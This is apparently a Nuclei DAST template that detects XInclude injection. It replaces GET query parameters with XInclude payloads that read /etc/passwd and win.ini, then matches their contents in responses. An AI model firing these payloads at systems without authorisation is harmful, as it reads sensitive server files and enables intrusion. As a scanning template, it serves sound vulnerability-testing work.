nuclei-templates/dast/vulnerabilities/injection/xinclude-injection.yaml

46 lines
1.6 KiB
YAML

id: xinclude-injection
info:
name: XInclude Injection - Detection
author: DhiyaneshDK,ritikchaddha
severity: high
description: |
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
reference:
- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
tags: dast,xxe,xinclude
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
xinc_fuzz:
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{xinc_fuzz}}'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'
# digest: 4a0a00473045022100b25c0306168fca549236f8877534a9ddbe228206ed95ba92039127e97f89c1d002207fb795beea65540ff515e458f9ccffe699c4293e15a188b9391acce754242356:922c64590222798bb761d5b6d8e72950